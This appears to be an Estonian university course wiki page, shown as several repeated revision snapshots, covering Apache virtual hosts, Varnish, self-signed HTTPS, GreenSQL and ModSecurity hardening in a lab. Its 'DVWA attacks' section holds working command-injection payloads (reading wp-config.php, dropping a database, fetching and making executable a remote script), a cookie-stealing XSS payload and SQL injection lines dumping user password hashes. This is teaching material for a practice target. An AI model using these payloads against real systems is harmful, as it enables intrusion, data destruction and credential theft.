8.8.8.8;cat /etc/apache2/sites-enabled/www.planet.zz
</source>

skripti laadimine serverisse ning sellele käivitusbiti andmine:
<source lang="bash">
8.8.8.8; wget http://enos.itcollege.ee/~kloodus/osadmin/skript.sh -O /var/tmp/skript; chmod +x /var/tmp/skript/skript.sh
</source>

Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
<source lang="bash">
; grep session.cookie_httponly /etc/php5/apache2/php.ini
</source>
Väljund:
* kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:

'''session.cookie_httponly = 1'''

* kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))

'''session.cookie_httponly = 0'''

==XSS==
<source lang="javascript">
<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>
</source>
==veel XSSi==
<pre>
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E
</pre>
==SQLi==
<source lang="sql">
#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --

2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --

3' union select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --

4' union select user_login,user_pass from wp.wp_users; #

3' union select TABLE_NAME,concat(COLUMN_NAME,'-','LISA') from information_schema.columns; #
</source>

=GreenSQL firewall=

<source lang="bash">
wget http://elab.itcollege.ee:8000/Day3/greensql-fw_1.3.0_amd64.deb

dpkg -i greensql-fw_1.3.0_amd64.deb

apt-get install -f

#Modify existing virtualhost or create new virtualhost.

cd /var/www/EXISTINGORNEW
ln -s /usr/share/greensql-fw/ greensql

cd greensql
chmod 0777 templates_c
</source>

Kasutajanimi veebiliidesel on '''admin''' ja parool '''pwd'''.

Muutke DVWA config failis andmebaasi asukohta:

<pre>
$_DVWA[ 'db_server' ] = '127.0.0.1:3305';
</pre>

<source lang="bash">
#lisage faili /etc/rc.local järgmine ride ENNE exit 0 rida
service greensql-fw start
</source>

=modsecurity=
==installeerimine==

<source lang="bash">
apt-get install libapache2-mod-security2
</source>

Muutke faili '''/etc/apache2/mods-available/security2.conf'''

<source lang="apache">
<IfModule security2_module>
# Default Debian dir for modsecurity's persistent data
SecDataDir /var/cache/modsecurity

# Include all the *.conf files in /etc/modsecurity.
# Keeping your local configuration in that directory
# will allow for an easy upgrade of THIS file and
# make your life easier
IncludeOptional /etc/modsecurity/*.conf
</IfModule>

</source>

Teeme nimelingi modsecurity reeglite seadistamiseks:

<source lang="bash">
ln -s /usr/share/modsecurity-crs/modsecurity_crs_10_setup.conf /etc/modsecurity/
</source>

=Apache2 tweaks=
<source lang="apache">
ServerSignature Off
ServerTokens Prod
</source>

http://chandank.com/webservers/apache/apache-web-server-hardening-security?start=3

== Apache testimine ==
Lisaks ab'le on olemas ka teisi utiliite:

1.Apache JMeter - http://jmeter.apache.org/download_jmeter.cgi 
2. httperf - http://www.hpl.hp.com/research/linux/httperf/download.php 
3. OpenWebLoad - http://openwebload.sourceforge.net/#download 
4. Allmon - https://code.google.com/p/allmon/downloads/list 
5. CLIF - http://clif.ow2.org/download/index.html 
6. curl-loader - http://sourceforge.net/projects/curl-loader/files/ 
7. deluge(alates 2002 ei ole uusi versioone) - http://sourceforge.net/projects/deluge/ 
8. dieseltest(ainult windowsile ning pole uuendatud aastast 2001) - http://sourceforge.net/projects/dieseltest/ 
9. FWPTT - http://sourceforge.net/projects/fwptt/files/ 
10. http_load - http://www.acme.com/software/http_load/

Virtualhost apache2 näitel

2015-05-04T10:06:29Z

Mernits: /* installeerimine */

[[Category:IT infrastruktuuri teenused]]
=Apache seadistamine=

<pre>
/etc/hosts

192.168.56.101 www.planet.zz
192.168.56.101 sales.planet.zz
</pre>

<source lang="bash">

ping www.planet.zz

ping sales.planet.zz

apt-get update
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz

cat >> /etc/network/interfaces <<EOL
auto eth1:0
iface eth1:0 inet static
address 192.168.56.201
netmask 255.255.255.0

EOL

ifup eth1:0

cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz
vim sales.planet.zz

a2ensite www.planet.zz
a2ensite sales.planet.zz
service apache2 reload

</source>

=WordPress tuning=

<source lang="apache">
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName wp.planet.zz
DocumentRoot /var/www/wordpress
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/wordpress>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all
</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/access.log combined

Alias /doc/ "/usr/share/doc/"
<Directory "/usr/share/doc/">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
</Directory>

</VirtualHost>

</source>

Pange tähele muudetud Directory seadeid.
<Directory /var/www/wordpress>
AllowOverride All

<source lang="bash">
echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj
a2enmod rewrite
a2enmod headers
a2enmod expires

</source>

Selle rea võib lisada alglaadimisel käivitatavasse faili ''/etc/rc.local''

Paigaldage oma valitud cace plugin wordpressile.

=Varnish=
Esmaselt tõstame apache2 porti 8080

<pre>
/etc/apache2/ports.conf
NameVirtualHost *:8080
Listen 8080
</pre>
<source lang="bash">
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i

#testimiseks
grep ':80' *

service apache2 restart

#testimiseks
netstat -lntp

#installeerime varnish cache
apt-get install varnish
vim /etc/default/varnish
</source>
<pre>
DAEMON_OPTS="-a :80 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-s malloc,256m"
</pre>
Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine
<pre>
sub vcl_recv {

# Add a unique header containing the client address

remove req.http.X-Forwarded-For;

set req.http.X-Forwarded-For = client.ip;

# [...]

}

</pre>
<source lang="bash">
service varnish restart
</source>

Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:

<source lang="bash">
cd /etc/apache2/sites-available/
</source>
Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan "wp"-nimelist faili.

<source lang="bash">
nano wp
</source>

Sinna tuleb kirjutada CustomLog'i rea asemele

<source lang="bash">
CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined
</source>

Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta

<source lang="bash">
cd /etc/apache2/conf.d/
</source>

Tee sinna uus fail nimega näiteks '''varnishlog.conf'''
<source lang="bash">
nano varnishlog.conf
</source>

Kirjuta sinna see rida
<source lang="bash">
LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined
</source>

Tee apache2 teenusele restart
<source lang="bash">
service apache2 restart
</source>

=DVWA ründed=
=HTTPS konfigureerimine=

ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key
<pre>
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
| . |
| + . |
| o + |
| * o |
| S + O |
| ..+ + + . |
| ...o o = |
| o+ o . |
| .o. E |
+-----------------+
</pre>

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req

<pre>
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:EE
State or Province Name (full name) [Some-State]:Harjumaa
Locality Name (eg, city) []:Tallinn
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

</pre>

sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem

<pre>
Signature ok
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz
Getting Private key
</pre>

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Seal muuta sisu (sert, dokument root, keyfail)

Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile

<pre>
ServerName www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key
</pre>

a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

=ID kaart=

[[ID kaardiga autentimine Apache2 veebiserveriga]]

=DVWA ründed=
==cmd exec==
<source lang="bash">
8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php
</source>

<source lang="bash">
8.8.8.8; ls -l
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//' ../../../../wordpress/wp-config.php
</source>

Loon faili kala /var/tmp kataloogi
<source lang="bash">
8.8.8.8; touch /var/tmp/kala.txt
</source>

Ning kontrollin kas fail loodi
<source lang="bash">
8.8.8.8; ls /var/tmp/
</source>

kustutada andmebaas (eelnevalt uurida andmebaasi nime ning parooli):
<source lang="bash">
8.8.8.8;mysqladmin DROP dvwa -y;
</source>

kuvada failide infot:
<source lang="bash">
8.8.8.8;cat /etc/apache2/sites-enabled/www.planet.zz
</source>

skripti laadimine serverisse ning sellele käivitusbiti andmine:
<source lang="bash">
8.8.8.8; wget http://enos.itcollege.ee/~kloodus/osadmin/skript.sh -O /var/tmp/skript; chmod +x /var/tmp/skript/skript.sh
</source>

Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
<source lang="bash">
; grep session.cookie_httponly /etc/php5/apache2/php.ini
</source>
Väljund:
* kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:

'''session.cookie_httponly = 1'''

* kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))

'''session.cookie_httponly = 0'''

==XSS==
<source lang="javascript">
<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>
</source>
==veel XSSi==
<pre>
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E
</pre>
==SQLi==
<source lang="sql">
#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --

2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --

3' union select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --

4' union select user_login,user_pass from wp.wp_users; #

3' union select TABLE_NAME,concat(COLUMN_NAME,'-','LISA') from information_schema.columns; #
</source>

=GreenSQL firewall=

<source lang="bash">
wget http://elab.itcollege.ee:8000/Day3/greensql-fw_1.3.0_amd64.deb

dpkg -i greensql-fw_1.3.0_amd64.deb

apt-get install -f

#Modify existing virtualhost or create new virtualhost.

cd /var/www/EXISTINGORNEW
ln -s /usr/share/greensql-fw/ greensql

cd greensql
chmod 0777 templates_c
</source>

Kasutajanimi veebiliidesel on '''admin''' ja parool '''pwd'''.

Muutke DVWA config failis andmebaasi asukohta:

<pre>
$_DVWA[ 'db_server' ] = '127.0.0.1:3305';
</pre>

<source lang="bash">
#lisage faili /etc/rc.local järgmine ride ENNE exit 0 rida
service greensql-fw start
</source>

=modsecurity=
==installeerimine==

<source lang="bash">
apt-get install libapache2-mod-security2
</source>

Muutke faili '''/etc/apache2/mods-available/security2.conf'''

<source lang="apache">
<IfModule security2_module>
# Default Debian dir for modsecurity's persistent data
SecDataDir /var/cache/modsecurity

# Include all the *.conf files in /etc/modsecurity.
# Keeping your local configuration in that directory
# will allow for an easy upgrade of THIS file and
# make your life easier
IncludeOptional /etc/modsecurity/*.conf
</IfModule>

</source>

Teeme nimelingi modsecurity reeglite seadistamiseks:

<source lang="bash">
ln -s /usr/share/modsecurity-crs/modsecurity_crs_10_setup.conf /etc/modsecurity/
</source>

==CRS==
https://github.com/SpiderLabs/owasp-modsecurity-crs

=Apache2 tweaks=
<source lang="apache">
ServerSignature Off
ServerTokens Prod
</source>

http://chandank.com/webservers/apache/apache-web-server-hardening-security?start=3

== Apache testimine ==
Lisaks ab'le on olemas ka teisi utiliite:

1.Apache JMeter - http://jmeter.apache.org/download_jmeter.cgi 
2. httperf - http://www.hpl.hp.com/research/linux/httperf/download.php 
3. OpenWebLoad - http://openwebload.sourceforge.net/#download 
4. Allmon - https://code.google.com/p/allmon/downloads/list 
5. CLIF - http://clif.ow2.org/download/index.html 
6. curl-loader - http://sourceforge.net/projects/curl-loader/files/ 
7. deluge(alates 2002 ei ole uusi versioone) - http://sourceforge.net/projects/deluge/ 
8. dieseltest(ainult windowsile ning pole uuendatud aastast 2001) - http://sourceforge.net/projects/dieseltest/ 
9. FWPTT - http://sourceforge.net/projects/fwptt/files/ 
10. http_load - http://www.acme.com/software/http_load/

Virtualhost apache2 näitel

2015-05-04T10:03:32Z

Mernits: /* installeerimine */

[[Category:IT infrastruktuuri teenused]]
=Apache seadistamine=

<pre>
/etc/hosts

192.168.56.101 www.planet.zz
192.168.56.101 sales.planet.zz
</pre>

<source lang="bash">

ping www.planet.zz

ping sales.planet.zz

apt-get update
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz

cat >> /etc/network/interfaces <<EOL
auto eth1:0
iface eth1:0 inet static
address 192.168.56.201
netmask 255.255.255.0

EOL

ifup eth1:0

cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz
vim sales.planet.zz

a2ensite www.planet.zz
a2ensite sales.planet.zz
service apache2 reload

</source>

=WordPress tuning=

<source lang="apache">
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName wp.planet.zz
DocumentRoot /var/www/wordpress
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/wordpress>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all
</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/access.log combined

Alias /doc/ "/usr/share/doc/"
<Directory "/usr/share/doc/">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
</Directory>

</VirtualHost>

</source>

Pange tähele muudetud Directory seadeid.
<Directory /var/www/wordpress>
AllowOverride All

<source lang="bash">
echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj
a2enmod rewrite
a2enmod headers
a2enmod expires

</source>

Selle rea võib lisada alglaadimisel käivitatavasse faili ''/etc/rc.local''

Paigaldage oma valitud cace plugin wordpressile.

=Varnish=
Esmaselt tõstame apache2 porti 8080

<pre>
/etc/apache2/ports.conf
NameVirtualHost *:8080
Listen 8080
</pre>
<source lang="bash">
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i

#testimiseks
grep ':80' *

service apache2 restart

#testimiseks
netstat -lntp

#installeerime varnish cache
apt-get install varnish
vim /etc/default/varnish
</source>
<pre>
DAEMON_OPTS="-a :80 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-s malloc,256m"
</pre>
Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine
<pre>
sub vcl_recv {

# Add a unique header containing the client address

remove req.http.X-Forwarded-For;

set req.http.X-Forwarded-For = client.ip;

# [...]

}

</pre>
<source lang="bash">
service varnish restart
</source>

Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:

<source lang="bash">
cd /etc/apache2/sites-available/
</source>
Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan "wp"-nimelist faili.

<source lang="bash">
nano wp
</source>

Sinna tuleb kirjutada CustomLog'i rea asemele

<source lang="bash">
CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined
</source>

Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta

<source lang="bash">
cd /etc/apache2/conf.d/
</source>

Tee sinna uus fail nimega näiteks '''varnishlog.conf'''
<source lang="bash">
nano varnishlog.conf
</source>

Kirjuta sinna see rida
<source lang="bash">
LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined
</source>

Tee apache2 teenusele restart
<source lang="bash">
service apache2 restart
</source>

=DVWA ründed=
=HTTPS konfigureerimine=

ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key
<pre>
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
| . |
| + . |
| o + |
| * o |
| S + O |
| ..+ + + . |
| ...o o = |
| o+ o . |
| .o. E |
+-----------------+
</pre>

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req

<pre>
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:EE
State or Province Name (full name) [Some-State]:Harjumaa
Locality Name (eg, city) []:Tallinn
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

</pre>

sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem

<pre>
Signature ok
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz
Getting Private key
</pre>

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Seal muuta sisu (sert, dokument root, keyfail)

Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile

<pre>
ServerName www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key
</pre>

a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

=ID kaart=

[[ID kaardiga autentimine Apache2 veebiserveriga]]

=DVWA ründed=
==cmd exec==
<source lang="bash">
8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php
</source>

<source lang="bash">
8.8.8.8; ls -l
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//' ../../../../wordpress/wp-config.php
</source>

Loon faili kala /var/tmp kataloogi
<source lang="bash">
8.8.8.8; touch /var/tmp/kala.txt
</source>

Ning kontrollin kas fail loodi
<source lang="bash">
8.8.8.8; ls /var/tmp/
</source>

kustutada andmebaas (eelnevalt uurida andmebaasi nime ning parooli):
<source lang="bash">
8.8.8.8;mysqladmin DROP dvwa -y;
</source>

kuvada failide infot:
<source lang="bash">
8.8.8.8;cat /etc/apache2/sites-enabled/www.planet.zz
</source>

skripti laadimine serverisse ning sellele käivitusbiti andmine:
<source lang="bash">
8.8.8.8; wget http://enos.itcollege.ee/~kloodus/osadmin/skript.sh -O /var/tmp/skript; chmod +x /var/tmp/skript/skript.sh
</source>

Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
<source lang="bash">
; grep session.cookie_httponly /etc/php5/apache2/php.ini
</source>
Väljund:
* kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:

'''session.cookie_httponly = 1'''

* kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))

'''session.cookie_httponly = 0'''

==XSS==
<source lang="javascript">
<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>
</source>
==veel XSSi==
<pre>
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E
</pre>
==SQLi==
<source lang="sql">
#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --

2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --

3' union select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --

4' union select user_login,user_pass from wp.wp_users; #

3' union select TABLE_NAME,concat(COLUMN_NAME,'-','LISA') from information_schema.columns; #
</source>

=GreenSQL firewall=

<source lang="bash">
wget http://elab.itcollege.ee:8000/Day3/greensql-fw_1.3.0_amd64.deb

dpkg -i greensql-fw_1.3.0_amd64.deb

apt-get install -f

#Modify existing virtualhost or create new virtualhost.

cd /var/www/EXISTINGORNEW
ln -s /usr/share/greensql-fw/ greensql

cd greensql
chmod 0777 templates_c
</source>

Kasutajanimi veebiliidesel on '''admin''' ja parool '''pwd'''.

Muutke DVWA config failis andmebaasi asukohta:

<pre>
$_DVWA[ 'db_server' ] = '127.0.0.1:3305';
</pre>

<source lang="bash">
#lisage faili /etc/rc.local järgmine ride ENNE exit 0 rida
service greensql-fw start
</source>

=modsecurity=
==installeerimine==

<source lang="bash">
apt-get install libapache2-mod-security2
</source>

Muutke faili '''/etc/apache2/mods-available/security2.conf'''

<source lang="apache">
<IfModule security2_module>
# Default Debian dir for modsecurity's persistent data
SecDataDir /var/cache/modsecurity

# Include all the *.conf files in /etc/modsecurity.
# Keeping your local configuration in that directory
# will allow for an easy upgrade of THIS file and
# make your life easier
IncludeOptional /etc/modsecurity/*.conf
</IfModule>

</source>

==CRS==
https://github.com/SpiderLabs/owasp-modsecurity-crs

=Apache2 tweaks=
<source lang="apache">
ServerSignature Off
ServerTokens Prod
</source>

http://chandank.com/webservers/apache/apache-web-server-hardening-security?start=3

== Apache testimine ==
Lisaks ab'le on olemas ka teisi utiliite:

1.Apache JMeter - http://jmeter.apache.org/download_jmeter.cgi 
2. httperf - http://www.hpl.hp.com/research/linux/httperf/download.php 
3. OpenWebLoad - http://openwebload.sourceforge.net/#download 
4. Allmon - https://code.google.com/p/allmon/downloads/list 
5. CLIF - http://clif.ow2.org/download/index.html 
6. curl-loader - http://sourceforge.net/projects/curl-loader/files/ 
7. deluge(alates 2002 ei ole uusi versioone) - http://sourceforge.net/projects/deluge/ 
8. dieseltest(ainult windowsile ning pole uuendatud aastast 2001) - http://sourceforge.net/projects/dieseltest/ 
9. FWPTT - http://sourceforge.net/projects/fwptt/files/ 
10. http_load - http://www.acme.com/software/http_load/

Virtualhost apache2 näitel

2015-05-04T10:00:41Z

Mernits: /* installeerimine */

[[Category:IT infrastruktuuri teenused]]
=Apache seadistamine=

<pre>
/etc/hosts

192.168.56.101 www.planet.zz
192.168.56.101 sales.planet.zz
</pre>

<source lang="bash">

ping www.planet.zz

ping sales.planet.zz

apt-get update
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz

cat >> /etc/network/interfaces <<EOL
auto eth1:0
iface eth1:0 inet static
address 192.168.56.201
netmask 255.255.255.0

EOL

ifup eth1:0

cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz
vim sales.planet.zz

a2ensite www.planet.zz
a2ensite sales.planet.zz
service apache2 reload

</source>

=WordPress tuning=

<source lang="apache">
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName wp.planet.zz
DocumentRoot /var/www/wordpress
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/wordpress>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all
</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/access.log combined

Alias /doc/ "/usr/share/doc/"
<Directory "/usr/share/doc/">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
</Directory>

</VirtualHost>

</source>

Pange tähele muudetud Directory seadeid.
<Directory /var/www/wordpress>
AllowOverride All

<source lang="bash">
echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj
a2enmod rewrite
a2enmod headers
a2enmod expires

</source>

Selle rea võib lisada alglaadimisel käivitatavasse faili ''/etc/rc.local''

Paigaldage oma valitud cace plugin wordpressile.

=Varnish=
Esmaselt tõstame apache2 porti 8080

<pre>
/etc/apache2/ports.conf
NameVirtualHost *:8080
Listen 8080
</pre>
<source lang="bash">
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i

#testimiseks
grep ':80' *

service apache2 restart

#testimiseks
netstat -lntp

#installeerime varnish cache
apt-get install varnish
vim /etc/default/varnish
</source>
<pre>
DAEMON_OPTS="-a :80 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-s malloc,256m"
</pre>
Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine
<pre>
sub vcl_recv {

# Add a unique header containing the client address

remove req.http.X-Forwarded-For;

set req.http.X-Forwarded-For = client.ip;

# [...]

}

</pre>
<source lang="bash">
service varnish restart
</source>

Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:

<source lang="bash">
cd /etc/apache2/sites-available/
</source>
Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan "wp"-nimelist faili.

<source lang="bash">
nano wp
</source>

Sinna tuleb kirjutada CustomLog'i rea asemele

<source lang="bash">
CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined
</source>

Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta

<source lang="bash">
cd /etc/apache2/conf.d/
</source>

Tee sinna uus fail nimega näiteks '''varnishlog.conf'''
<source lang="bash">
nano varnishlog.conf
</source>

Kirjuta sinna see rida
<source lang="bash">
